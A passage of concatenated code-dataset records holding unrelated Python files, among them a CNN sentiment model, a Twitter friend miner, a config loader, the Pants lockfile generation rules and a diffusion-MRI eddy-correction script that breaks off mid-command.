text.permute(1, 0)\n \n #text = [batch size, sent len]\n \n embedded = self.embedding(text)\n \n #embedded = [batch size, sent len, emb dim]\n \n embedded = embedded.unsqueeze(1)\n \n #embedded = [batch size, 1, sent len, emb dim]\n \n conved = [F.relu(conv(embedded)).squeeze(3) for conv in self.convs]\n \n #conv_n = [batch size, n_filters, sent len - filter_sizes[n]]\n \n pooled = [F.max_pool1d(conv, conv.shape[2]).squeeze(2) for conv in conved]\n \n #pooled_n = [batch size, n_filters]\n \n cat = self.dropout(torch.cat(pooled, dim = 1))\n\n #cat = [batch size, n_filters * len(filter_sizes)]\n \n return self.fc(cat)\n\n\nINPUT_DIM = 20002\nEMBEDDING_DIM = 100\nN_FILTERS = 100\nFILTER_SIZES = [2,3,4]\nOUTPUT_DIM = 6\nDROPOUT = 0.5\nPAD_IDX = 1\n\nmodel = CNN(INPUT_DIM, EMBEDDING_DIM, N_FILTERS, \nFILTER_SIZES ,OUTPUT_DIM, DROPOUT, PAD_IDX)\n\nmodel.load_state_dict(torch.load('./cnn/tut2-model.pt'))\nimport pickle\n\nTEXT = pickle.load(open('./cnn/train_data_field', 'rb'))\n\nimport spacy\nnlp = spacy.load('en')\n\ndef predict_sentiment(sentence):\n model.eval()\n tokenized = [tok.text for tok in nlp.tokenizer(sentence)]\n indexed = [TEXT.vocab.stoi[t] for t in tokenized]\n\n \n length = [len(indexed)]\n tensor = torch.LongTensor(indexed).to(device)\n tensor = tensor.unsqueeze(1)\n length_tensor = torch.LongTensor(length)\n\n prediction = torch.sigmoid(model(tensor))\n return list(prediction.squeeze().detach())\n","sub_path":"cnn/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"556932394","text":"#-*- coding: utf-8 -*- \nimport twitterMiner as tm\nimport networkx as nx\nimport pickle\nfrom pprint import pprint\n\nspain = pickle.load(open('spain_detailed.p'))\nengland = pickle.load(open('england_detailed.p'))\n\ntwitter = 
tm.get_twitter()\n\ndef get_player_friends(g):\n gs = nx.read_graphml(g)\n for node in gs.nodes():\n screenName = gs.node[node] \n playerFriends = twitter.get_friends_list(screen_name=screenName)\n for friend in playerFriends['users']:\n print(friend.keys()[0])\n return gs\n\nspainGraph = get_player_friends('followersSpain.graphml')\n#englandGraph = get_player_friends(england)\n\nnx.write_graphml(spainGraph, 'spain528.graphml.gz')\n#nx.write_graphml(englandGraph, 'england.graphml.gz')\n","sub_path":"friends.py","file_name":"friends.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"633960644","text":"f = open(\"random_output.txt\", \"r+\")\nl = f.readlines()\nf.close()\n\nd = {}\nfor s in l:\n\ts = s.strip()\n\tfor i in s:\n\t\tif i in d:\n\t\t\td[i] += 1\n\t\telse:\n\t\t\td[i] = 1\nprint(sorted(d))","sub_path":"level_4/letters.py","file_name":"letters.py","file_ext":"py","file_size_in_byte":174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"288123789","text":"import speech_recognition as sr \r\nclass Microfone:\r\n\tdef __init__(self):\r\n\t\tglobal falou\r\n\t\tr = sr.Recognizer() \r\n\t\twith sr.Microphone() as source: \r\n\t\t\tprint(\"Ready for your command\") \r\n\t\t\taudio = r.listen(source) \r\n\t\ttry:\r\n\t\t\tfalou = r.recognize_google(audio, language=\"pt-BR\")\r\n\t\t\tprint(\"You said \" + falou)\r\n\t\texcept sr.UnknownValueError:\r\n\t\t\tprint(\"I did not understand\")\r\n\t\texcept sr.RequestError as e:\r\n\t\t\tprint(\"Request failed; {0}\".format(e))","sub_path":"microfone.py","file_name":"microfone.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
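# --- Added illustration (not part of the original letters.py record) ---
# The character-counting loop in letters.py above is collections.Counter in
# the standard library:
from collections import Counter

with open('random_output.txt') as f:
    counts = Counter(ch for line in f for ch in line.strip())
print(sorted(counts))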
+{"seq_id":"113605009","text":"# -*- coding: utf-8 -*-\n'''\nMultiplexer Configuration\n\n{\n \"artifacts\": [\n {\n \"name\": \"production/allapps\",\n \"sources\": [\n {\"name\": \"app1\", \"revision\": \"prod\"},\n {\"name\": \"app2\", \"revision\": \"master\"},\n {\"name\": \"app3\", \"revision\": \"production\"}\n ]\n },\n {\n \"name\": \"staging/allapps\",\n \"sources\": [\n {\"name\": \"app1\", \"revision\": \"prod\"},\n {\"name\": \"app3\", \"revision\": \"staging\"}\n ]\n }\n ],\n \"github\": {\n \"token\": \"mytoken\"\n },\n \"sources\": {\n \"app1\": {\n \"owner\": \"myorg\",\n \"repository\": \"app1\",\n \"type\": \"github\"\n },\n \"app2\": {\n \"type\": \"github\",\n \"revision\": \"production\",\n \"owner\": \"myorg\",\n \"repository\": \"app2\"\n },\n \"app3\": {\n \"type\": \"github\",\n \"owner\": \"myorg\",\n \"repository\": \"app3\"\n }\n }\n}\n'''\n\nimport time\n\nfrom collections import OrderedDict\n\nimport boto3\nimport json\nimport re\n\n\nTYPES = {'github': {'token': None}}\nS3_REGEX = r'^s3:\\/\\/([a-zA-Z0-9\\_\\-]+)\\/?([a-zA-Z0-9\\_\\/\\.]+)?'\n\ndef load(conf):\n '''Attempts to load the config after checking for S3 or local'''\n s3_info = re.search(S3_REGEX, conf)\n\n if s3_info:\n bucket = s3_info.group(1)\n key = s3_info.group(2)\n return load_s3(bucket, key)\n\n return load_file(conf)\n\n\ndef load_s3(s3_bucket, s3_object):\n \"\"\"Load Configuration file from an S3 Bucket\"\"\"\n client = boto3.client('s3')\n resp = client.get_object(\n Bucket=s3_bucket,\n Key=s3_object,\n )\n\n conf_body = resp['Body'].read()\n if isinstance(conf_body, (bytes, bytearray)):\n conf_body = conf_body.decode('utf-8')\n return Configuration(conf_body)\n\n\ndef load_file(pth):\n \"\"\"Load configuration from local file\"\"\"\n fil = open(pth, 'r')\n return Configuration(fil.read())\n\n\nclass Configuration(object):\n def __init__(self, body):\n self._raw = {}\n self.artifacts = []\n\n self._load(body)\n self._validate()\n\n def _load(self, raw_body):\n \"\"\"Load JSON file\"\"\"\n body = json.loads(raw_body)\n self._raw = body\n\n # Populate self.artifacts\n for artifact in self._raw.get('artifacts', []):\n art_obj = {'name': artifact['name'], 'sources': OrderedDict()}\n\n for repo in artifact.get('sources', []):\n r_info = self._raw['sources'].get(repo['name'])\n if not r_info:\n raise Exception(\n 'source {} defined in artifact {} but not listed in sources'.format(\n repo['name'], artifact['name']))\n\n r = r_info.copy()\n r.update(repo)\n art_obj['sources'][repo['name']] = r\n self.artifacts.append(art_obj)\n\n def _validate(self):\n \"\"\"Validate Configuration structure\"\"\"\n req = {'artifacts': list, 'sources': dict}\n for key, typ in req.items():\n val = self._raw.get(key)\n if not val:\n raise Exception('configuration missing required key ' + key)\n\n if not isinstance(val, typ):\n raise Exception('key {} invalid type, expect {}'.format(\n key, typ))\n\n # TODO: Validate attributes are set per the type in sources\n for name, repo in self._raw['sources'].items():\n typ = repo.get('type')\n if not repo.get('type'):\n raise Exception('source {} missing type'.format(\n name))\n\n if not TYPES.get(typ):\n raise ValueError('invalid type ' + typ)\n\n # If the type configuration is not set then set the defaults\n if not self._raw.get(typ):\n self._raw[typ] = TYPES[typ]\n\n def lookup_artifacts(self, source, revision, source_type='github'):\n \"\"\"Return a list of artifacts to build based on a source and revision\"\"\"\n if not source_type == 'github':\n raise Exception('github only supported source at this time')\n\n owner, repo = source.split('/')\n res_artifacts = []\n for artifact in self.artifacts:\n for name, info in artifact['sources'].items():\n if info['owner'] == owner and info['repository'] == repo and info['revision'] == revision:\n res_artifacts.append(artifact)\n\n return res_artifacts\n\n def artifact(self, name):\n \"\"\"Return the artifact object given a name\"\"\"\n for artifact in self.artifacts:\n if artifact['name'] == name:\n return artifact\n\n raise Exception('artifact {} does not exist'.format(name))\n\n def __getattr__(self, key):\n \"\"\"Override getattr\"\"\"\n if key in self._raw:\n return self._raw[key]\n\n return object.__getattribute__(self, key)\n","sub_path":"multiplexer/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
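# --- Added illustration (not part of the original multiplexer/config.py record) ---
# What S3_REGEX above captures: group(1) is the bucket, group(2) the optional key.
import re

S3_REGEX = r'^s3:\/\/([a-zA-Z0-9\_\-]+)\/?([a-zA-Z0-9\_\/\.]+)?'
m = re.search(S3_REGEX, 's3://my-bucket/configs/prod.json')
print(m.group(1), m.group(2))  # my-bucket configs/prod.json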
+{"seq_id":"66297360","text":"# This example illustrates how the ** operator is used\n#\n# reference: http://stackoverflow.com/questions/2921847/what-does-the-star-operator-mean-in-python\n# http://www.cnblogs.com/fengmk2/archive/2008/04/21/1163766.html\n#\n# def sum(a, b, c, d):\n# return a + b + c + d\n#\n# values1 = (1, 2)\n# values2 = { 'c': 10, 'd': 15 }\n# s = sum(*values1, **values2)\n#\n# which is equivalent to:\n# s = sum(1, 2, c=10, d=15)\n#\n\n\ndef dump_params(**params):\n # Calling dump_params(a=1, b=2, c=3) shows that inside the function\n # the keyword arguments are packed back into a dict.\n # By the same idea, if the caller holds a dict it must be unpacked with **;\n # on the function side ** packs the arguments into a dict again.\n\n print (params)\n\n\ndef dump_dict(**params):\n print(\"length of params: {0}\".format(len(params)))\n \n for key in params:\n print(\"key: {0}, value: {1}\".format(key, params[key]))\n\n\ndef build_dict(**params):\n return params\n\n\n\nif __name__ == \"__main__\":\n json = {'a':12, 'b':13, 'c':14}\n \n # This will show:\n # key: c, value: 14\n # key: b, value: 13\n # key: a, value: 12 \n # Note one thing: because this is a dict, the items are not ordered.\n # Even if they look ordered, it is only a coincidence!\n dump_dict(**json)\n \n # dump_params expects an already-unpacked dict; passing the dict itself raises an error\n try:\n dump_params(json)\n except TypeError:\n print(\"dump_params Error, Because of wrong type\")\n\n dump_params(a=1, b=2, c=3)\n \n # Building a dict this way is very convenient!\n print (build_dict(a=1, b=2, c=3))\n\n\n\n","sub_path":"star_param/double_star.py","file_name":"double_star.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"483131267","text":"import sys\nimport os\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\n\nfrom src.file_reader import FileReader\nfrom src.sudoku_generator import SudokuBoardGenerator\n\nfrom src.file_writer import FileWriter\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print('Must specify input file and output file only')\n quit()\n\n else:\n input_file_str = sys.argv[1]\n output_file_str = sys.argv[2]\n\n try:\n input_file = open(input_file_str, 'r')\n output_file = open(output_file_str, 'w')\n except OSError:\n print('Error opening file')\n quit()\n\n fileReader = FileReader(input_file)\n fileWriter = FileWriter(output_file)\n M, N, P, Q = fileReader.get_params_generator()\n\n sudoku_board = SudokuBoardGenerator(M, N, P, Q)\n sudoku_board.generate_board()\n board_as_lists = sudoku_board.convert_board_to_list()\n fileWriter.write_generated_board_to_file(N, P, Q, board_as_lists)","sub_path":"bin/MySudokuGenerator.py","file_name":"MySudokuGenerator.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"113975016","text":"# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import annotations\n\nimport logging\nfrom dataclasses import dataclass\nfrom pathlib import PurePath\nfrom textwrap import dedent\nfrom typing import Iterable\n\nfrom pants.backend.experimental.python.lockfile_metadata import (\n LockfileMetadata,\n calculate_invalidation_digest,\n)\nfrom pants.backend.python.subsystems.python_tool_base import (\n DEFAULT_TOOL_LOCKFILE,\n NO_TOOL_LOCKFILE,\n PythonToolRequirementsBase,\n)\nfrom pants.backend.python.target_types import EntryPoint, PythonRequirementsField\nfrom pants.backend.python.util_rules.interpreter_constraints import InterpreterConstraints\nfrom pants.backend.python.util_rules.pex import PexRequest, PexRequirements, VenvPex, VenvPexProcess\nfrom pants.backend.python.util_rules.poetry_conversions import create_pyproject_toml\nfrom pants.engine.addresses import Addresses\nfrom pants.engine.fs import (\n CreateDigest,\n Digest,\n DigestContents,\n FileContent,\n MergeDigests,\n Workspace,\n)\nfrom pants.engine.goal import Goal, GoalSubsystem\nfrom pants.engine.process import ProcessResult\nfrom pants.engine.rules import Get, MultiGet, collect_rules, goal_rule, rule\nfrom pants.engine.target import TransitiveTargets, TransitiveTargetsRequest\nfrom pants.engine.unions import UnionMembership, union\nfrom pants.python.python_setup import PythonSetup\nfrom pants.util.logging import LogLevel\nfrom pants.util.ordered_set import FrozenOrderedSet\nfrom pants.util.strutil import pluralize\n\nlogger = logging.getLogger(__name__)\n\n# 
--------------------------------------------------------------------------------------\n# Generic lockfile generation\n# --------------------------------------------------------------------------------------\n\n\nclass PoetrySubsystem(PythonToolRequirementsBase):\n options_scope = \"poetry\"\n help = \"Used to generate lockfiles for third-party Python dependencies.\"\n\n default_version = \"poetry==1.1.7\"\n\n register_interpreter_constraints = True\n default_interpreter_constraints = [\"CPython>=3.6\"]\n\n\n# We must monkeypatch Poetry to include `setuptools` and `wheel` in the lockfile. This was fixed\n# in Poetry 1.2. See https://github.com/python-poetry/poetry/issues/1584.\n# WONTFIX(#12314): only use this custom launcher if using Poetry 1.1..\nPOETRY_LAUNCHER = FileContent(\n \"__pants_poetry_launcher.py\",\n dedent(\n \"\"\"\\\n from poetry.console import main\n from poetry.puzzle.provider import Provider\n\n Provider.UNSAFE_PACKAGES = set()\n main()\n \"\"\"\n ).encode(),\n)\n\n\n@dataclass(frozen=True)\nclass PythonLockfile:\n digest: Digest\n path: str\n\n\n@dataclass(frozen=True)\nclass PythonLockfileRequest:\n requirements: FrozenOrderedSet[str]\n interpreter_constraints: InterpreterConstraints\n dest: str\n description: str\n regenerate_command: str\n\n @classmethod\n def from_tool(\n cls,\n subsystem: PythonToolRequirementsBase,\n interpreter_constraints: InterpreterConstraints | None = None,\n *,\n extra_requirements: Iterable[str] = (),\n ) -> PythonLockfileRequest:\n \"\"\"Create a request for a dedicated lockfile for the tool.\n\n If the tool determines its interpreter constraints by using the constraints of user code,\n rather than the option `--interpreter-constraints`, you must pass the arg\n `interpreter_constraints`.\n \"\"\"\n return cls(\n requirements=FrozenOrderedSet((*subsystem.all_requirements, *extra_requirements)),\n interpreter_constraints=(\n interpreter_constraints\n if interpreter_constraints is not None\n else subsystem.interpreter_constraints\n ),\n dest=subsystem.lockfile,\n description=f\"Generate lockfile for {subsystem.options_scope}\",\n regenerate_command=\"./pants tool-lock\",\n )\n\n @property\n def requirements_hex_digest(self) -> str:\n \"\"\"Produces a hex digest of the requirements input for this lockfile.\"\"\"\n return calculate_invalidation_digest(self.requirements)\n\n\n@rule(desc=\"Generate lockfile\", level=LogLevel.DEBUG)\nasync def generate_lockfile(\n req: PythonLockfileRequest, poetry_subsystem: PoetrySubsystem, python_setup: PythonSetup\n) -> PythonLockfile:\n pyproject_toml = create_pyproject_toml(req.requirements, req.interpreter_constraints).encode()\n pyproject_toml_digest, launcher_digest = await MultiGet(\n Get(Digest, CreateDigest([FileContent(\"pyproject.toml\", pyproject_toml)])),\n Get(Digest, CreateDigest([POETRY_LAUNCHER])),\n )\n\n poetry_pex = await Get(\n VenvPex,\n PexRequest(\n output_filename=\"poetry.pex\",\n internal_only=True,\n requirements=poetry_subsystem.pex_requirements(),\n interpreter_constraints=poetry_subsystem.interpreter_constraints,\n main=EntryPoint(PurePath(POETRY_LAUNCHER.path).stem),\n sources=launcher_digest,\n ),\n )\n\n # WONTFIX(#12314): Wire up Poetry to named_caches.\n # WONTFIX(#12314): Wire up all the pip options like indexes.\n poetry_lock_result = await Get(\n ProcessResult,\n VenvPexProcess(\n poetry_pex,\n argv=(\"lock\",),\n input_digest=pyproject_toml_digest,\n output_files=(\"poetry.lock\", \"pyproject.toml\"),\n description=req.description,\n ),\n )\n poetry_export_result = await 
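# --- Added illustration (not part of the original pants lockfile.py record; the
# record's `generate_lockfile` rule continues around this block) ---
# Sketch of what an "invalidation digest" over a requirement set amounts to.
# The real helper is calculate_invalidation_digest from lockfile_metadata; this
# stand-in is an assumption-labeled illustration, not pants' implementation:
import hashlib
import json

def invalidation_digest(requirements):
    # stable hash: order-independent thanks to sorting before serialization
    return hashlib.sha256(json.dumps(sorted(requirements)).encode()).hexdigest()

print(invalidation_digest({"poetry==1.1.7", "setuptools", "wheel"}))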
Get(\n ProcessResult,\n VenvPexProcess(\n poetry_pex,\n argv=(\"export\", \"-o\", req.dest),\n input_digest=poetry_lock_result.output_digest,\n output_files=(req.dest,),\n description=(f\"Exporting Poetry lockfile to requirements.txt format for {req.dest}\"),\n level=LogLevel.DEBUG,\n ),\n )\n\n initial_lockfile_digest_contents = await Get(\n DigestContents, Digest, poetry_export_result.output_digest\n )\n metadata = LockfileMetadata(req.requirements_hex_digest, req.interpreter_constraints)\n lockfile_with_header = metadata.add_header_to_lockfile(\n initial_lockfile_digest_contents[0].content,\n regenerate_command=(\n python_setup.lockfile_custom_regeneration_command or req.regenerate_command\n ),\n )\n final_lockfile_digest = await Get(\n Digest, CreateDigest([FileContent(req.dest, lockfile_with_header)])\n )\n return PythonLockfile(final_lockfile_digest, req.dest)\n\n\n# --------------------------------------------------------------------------------------\n# User lockfiles\n# --------------------------------------------------------------------------------------\n\n\nclass LockSubsystem(GoalSubsystem):\n name = \"lock\"\n help = \"Generate a lockfile.\"\n\n\nclass LockGoal(Goal):\n subsystem_cls = LockSubsystem\n\n\n@goal_rule\nasync def lockfile_goal(\n addresses: Addresses,\n python_setup: PythonSetup,\n workspace: Workspace,\n) -> LockGoal:\n if python_setup.lockfile is None:\n logger.warning(\n \"You ran `./pants lock`, but `[python-setup].experimental_lockfile` is not set. Please \"\n \"set this option to the path where you'd like the lockfile for your code's \"\n \"dependencies to live.\"\n )\n return LockGoal(exit_code=1)\n\n # TODO(#12314): Looking at the transitive closure to generate a single lockfile will not work\n # when we have multiple user lockfiles supported. Ideally, `./pants lock ::` would mean\n # \"regenerate all unique lockfiles\", whereas now it means \"generate a single lockfile based\n # on this transitive closure.\"\n transitive_targets = await Get(TransitiveTargets, TransitiveTargetsRequest(addresses))\n\n reqs = PexRequirements.create_from_requirement_fields(\n tgt[PythonRequirementsField]\n # NB: By looking at the dependencies, rather than the closure, we only generate for\n # requirements that are actually used in the project.\n for tgt in transitive_targets.dependencies\n if tgt.has_field(PythonRequirementsField)\n )\n\n if not reqs:\n logger.warning(\n \"No third-party requirements found for the transitive closure, so a lockfile will not \"\n \"be generated.\"\n )\n return LockGoal(exit_code=0)\n\n result = await Get(\n PythonLockfile,\n PythonLockfileRequest(\n reqs.req_strings,\n # TODO(#12314): Use interpreter constraints from the transitive closure.\n InterpreterConstraints(python_setup.interpreter_constraints),\n dest=python_setup.lockfile,\n description=(\n f\"Generate lockfile for {pluralize(len(reqs.req_strings), 'requirement')}: \"\n f\"{', '.join(reqs.req_strings)}\"\n ),\n # TODO(12382): Make this command actually accurate once we figure out the semantics\n # for user lockfiles. 
This is currently misleading.\n regenerate_command=\"./pants lock ::\",\n ),\n )\n workspace.write_digest(result.digest)\n logger.info(f\"Wrote lockfile to {result.path}\")\n\n return LockGoal(exit_code=0)\n\n\n# --------------------------------------------------------------------------------------\n# Tool lockfiles\n# --------------------------------------------------------------------------------------\n\n\n@union\nclass PythonToolLockfileSentinel:\n pass\n\n\n# TODO(#12314): Unify this goal with `lock` once we figure out how to unify the semantics,\n# particularly w/ CLI specs. This is a separate goal only to facilitate progress.\nclass ToolLockSubsystem(GoalSubsystem):\n name = \"tool-lock\"\n help = \"Generate a lockfile for a Python tool.\"\n required_union_implementations = (PythonToolLockfileSentinel,)\n\n\nclass ToolLockGoal(Goal):\n subsystem_cls = ToolLockSubsystem\n\n\n@goal_rule\nasync def generate_all_tool_lockfiles(\n workspace: Workspace,\n union_membership: UnionMembership,\n) -> ToolLockGoal:\n # TODO(#12314): Add logic to inspect the Specs and generate for only relevant lockfiles. For\n # now, we generate for all tools.\n requests = await MultiGet(\n Get(PythonLockfileRequest, PythonToolLockfileSentinel, sentinel())\n for sentinel in union_membership.get(PythonToolLockfileSentinel)\n )\n if not requests:\n return ToolLockGoal(exit_code=0)\n\n results = await MultiGet(\n Get(PythonLockfile, PythonLockfileRequest, req)\n for req in requests\n if req.dest not in {NO_TOOL_LOCKFILE, DEFAULT_TOOL_LOCKFILE}\n )\n merged_digest = await Get(Digest, MergeDigests(res.digest for res in results))\n workspace.write_digest(merged_digest)\n for result in results:\n logger.info(f\"Wrote lockfile to {result.path}\")\n\n return ToolLockGoal(exit_code=0)\n\n\ndef rules():\n return collect_rules()\n","sub_path":"src/python/pants/backend/experimental/python/lockfile.py","file_name":"lockfile.py","file_ext":"py","file_size_in_byte":10891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"401536371","text":"import KeyManagementModule\nimport UserOperationsModule\n\n#initializations\nKeyManagementModule.importPubliclist()\nUserOperationsModule.importuserlist()\n\nans=True\nwhile ans:\n print (\"\"\"MAIN MENU\n 0. Exit from the Program\n 1. Register to the system\n 2. 
Login with the existing account\n \"\"\")\n ans=raw_input(\"Selection: \")\n if ans == \"0\":\n print(\"\\n Goodbye\")\n ans = False\n elif ans==\"1\":\n print(\"\\n***> Register to the system <***\")\n uid = UserOperationsModule.registerToSystem()\n elif ans==\"2\":\n print(\"\\n***> Login <***\")\n id=UserOperationsModule.login()\n if id!=0: #succesfull login\n UserOperationsModule.submenu(id)\n elif ans !=\"\":\n print(\"\\n Not Valid Choice Try again\")\n\n\n\n\n\n","sub_path":"testmodule.py","file_name":"testmodule.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"201779063","text":"#this script takes converted bbc dti data, skull strips and performs eddy current correction with and without\n#--repol replace outliers\nimport os, inspect, datetime\nfrom pathlib import *\nimport numpy as np\nimport nibabel as nib\nimport mmimproc\nfrom scipy.ndimage.measurements import center_of_mass as com\nfrom scipy.ndimage.filters import median_filter as medianf\nfrom nipype.interfaces import fsl\nfrom dipy.io import read_bvals_bvecs\nfrom dipy.core.gradients import gradient_table\nfrom dipy.segment.mask import applymask\nfrom mmimproc.io.images import savenii\nfrom mmimproc.projects.bbc.dwi.passed_qc import dwi_passed_qc, dwi_passed_101\nfrom mmimproc.utils.provenance import ProvenanceWrapper\nfrom mmimproc.io.images import savenii\nfrom mmimproc.conversion.nifti2nrrd import nii2nrrd\nfrom mmimproc.utils import run_subprocess, WorkingContext\nfrom mmimproc.utils.paths import getnetworkdataroot\n#set up instances\nprovenance = ProvenanceWrapper()\nfs = mmimproc.fs_local\nflt = fsl.FLIRT(bins=640, interp='nearestneighbour', cost_func='mutualinfo', output_type='NIFTI')\napplyxfm = fsl.ApplyXFM(interp='nearestneighbour', output_type='NIFTI')\nbet = fsl.BET(output_type='NIFTI')\npylabs_basepath = Path(*Path(inspect.getabsfile(mmimproc)).parts[:-2])\n#set paths for BET atlases\nMNI_bet_zcut = pylabs_basepath / 'data' / 'atlases' / 'MNI152_T1_1mm_bet_zcut.nii.gz'\nMNI_bet_zcut_mask = pylabs_basepath / 'data' / 'atlases' / 'MNI152_T1_1mm_bet_zcut_mask.nii.gz'\nMNI_bet_com = pylabs_basepath / 'data' / 'atlases' / 'MNI152_T1_1mm-com-mask8k.nii.gz'\n#set up project variables\nproject = 'bbc'\n#directory where eddy current corrected data is stored\noutdir = 'cuda_repol_std2_S0mf3_v5'\nfilterS0_string = ''\nfilterS0 = True\nif filterS0:\n filterS0_string = '_withmf3S0'\nfname_templ = 'sub-bbc{sid}_ses-{snum}_{meth}_{runnum}'\ndwi_fnames = [fname_templ.format(sid=str(s), snum=str(ses), meth=m, runnum=str(r)) for s, ses, m, r in dwi_passed_qc]\noverride_mask = {'sub-bbc101_ses-2_dti_15dir_b1000_1': fs / project / 'sub-bbc101/ses-2/dwi/sub-bbc101_ses-2_dti_15dir_b1000_1_S0_brain_mask_jsedits.nii'}\n#loop over pairs\nfor dwif in dwi_fnames:\n infpath = fs / project / dwif.split('_')[0] / dwif.split('_')[1] / 'dwi'\n fdwi = infpath / str(dwif + '.nii')\n fbvecs = infpath / str(dwif + '.bvecs')\n fbvals = infpath / str(dwif + '.bvals')\n fdwell = infpath / str(dwif + '.dwell_time')\n S0_fname = infpath / str(dwif + '_S0.nii')\n with WorkingContext(str(infpath)):\n bvals, bvecs = read_bvals_bvecs(str(fbvals), str(fbvecs))\n # make dipy gtab and load dwi data\n gtab = gradient_table(bvals, bvecs)\n img = nib.load(str(fdwi))\n data = img.get_data()\n # make S0 and bet to get mask\n S0 = data[:, :, :, gtab.b0s_mask]\n if filterS0:\n S0_fname = infpath / str(dwif + filterS0_string +'_S0.nii')\n S0 = medianf(S0, size=3)\n 
data[:, :, :, gtab.b0s_mask] = S0\n fdwi = infpath / str(dwif + filterS0_string + '.nii')\n savenii(data, img.affine, str(fdwi), header=img.header)\n savenii(S0, img.affine, str(S0_fname))\n provenance.log(str(S0_fname), 'S0 dwi from '+str(fdwi), str(fdwi), code=__file__)\n #setup result object capture\n fslresult = ()\n dt = datetime.datetime.now()\n fslresult += (str(dt),'flirt_zcut2S0')\n # make mat file to apply mask and com\n flt.inputs.in_file = str(MNI_bet_zcut)\n flt.inputs.reference = str(S0_fname)\n flt.inputs.out_matrix_file = str(S0_fname)[: -6] + 'bet2S0.mat'\n flt.inputs.out_file = str(S0_fname)[: -6] + 'S0_zcut.nii'\n result = flt.run()\n fslresult += (result,)\n # apply mat file to center of mass ROI in MNI template\n dt = datetime.datetime.now()\n fslresult += (str(dt),'applyxfm_com2S0')\n applyxfm.inputs.in_matrix_file = str(S0_fname)[: -6] + 'bet2S0.mat'\n applyxfm.inputs.in_file = str(MNI_bet_com)\n applyxfm.inputs.out_file = str(infpath / str(dwif + '_S0_match_bet_com_roi.nii'))\n applyxfm.inputs.reference = str(S0_fname)\n applyxfm.inputs.apply_xfm = True\n result = applyxfm.run()\n fslresult += (result,)\n # apply mat file to MNI mask file to cut off neck\n dt = datetime.datetime.now()\n fslresult += (str(dt),'applyxfm_mask2S0')\n applyxfm.inputs.in_matrix_file = str(S0_fname)[: -6] + 'bet2S0.mat'\n applyxfm.inputs.in_file = str(MNI_bet_zcut_mask)\n applyxfm.inputs.out_file = str(infpath / str(dwif + '_S0_mask.nii'))\n applyxfm.inputs.reference = str(S0_fname)\n applyxfm.inputs.apply_xfm = True\n result = applyxfm.run()\n fslresult += (result,)\n # chop off neck with MNI zcut\n zcut_data = nib.load(str(infpath / str(dwif + '_S0_mask.nii'))).get_data()\n zcut_data_maskb = zcut_data > 0\n S0_mask = np.zeros(np.squeeze(S0).shape) # need to add a fourth dim here\n S0_mask[zcut_data_maskb] = 1\n S0_zcut = applymask(S0, S0_mask)\n savenii(S0_zcut, img.affine, str(infpath / str(dwif + '_S0_zcut.nii')))\n\n # get com for fsl bet\n com_data = nib.load(str(infpath / str(dwif + '_S0_match_bet_com_roi.nii'))).get_data()\n com_data_maskb = com_data > 4000\n com_data_mask = np.zeros(com_data.shape)\n com_data_mask[com_data_maskb] = 1\n match_com = np.round(com(com_data_mask)).astype(int)\n\n # extract brain and make brain mask before eddy current correction\n brain_outfname = str(S0_fname)[: -6] + 'S0_brain'\n bet.inputs.in_file = str(infpath / str(dwif + '_S0_zcut.nii'))\n bet.inputs.center = list(match_com)\n bet.inputs.frac = 0.3\n bet.inputs.mask = True\n bet.inputs.skull = True\n bet.inputs.out_file = brain_outfname + '.nii'\n result = bet.run()\n fslresult += (result,)\n provenance.log(brain_outfname + '.nii', 'brain extracted S0 dwi from ' + str(dwif), str(S0_fname), code=__file__)\n provenance.log(brain_outfname + '_mask.nii', 'dwi brain mask from ' + str(dwif), str(S0_fname), code=__file__)\n # make index and acquisition parameters files\n with open(str(infpath / 'index.txt'), 'w') as f:\n f.write('1 ' * len(gtab.bvals))\n\n with open(str(fdwell), 'r') as f:\n dwell = f.read().replace('\\n', '')\n\n with open(str(infpath / 'acq_params.txt'), 'w') as f:\n f.write('0 1 0 ' + dwell)\n\n # execute eddy command in subprocess in local working directory using repol and lower stddev and linear 2nd level model\n # winner of DWI preproc deathmatch Oct-2016\n outpath = infpath / outdir\n if not outpath.is_dir():\n outpath.mkdir(parents=True)\n cmd = ''\n output = ()\n dt = datetime.datetime.now()\n output += (str(dt), 'eddy cuda start time for '+str(fdwi))\n cmd += 'eddy_cuda7.5 
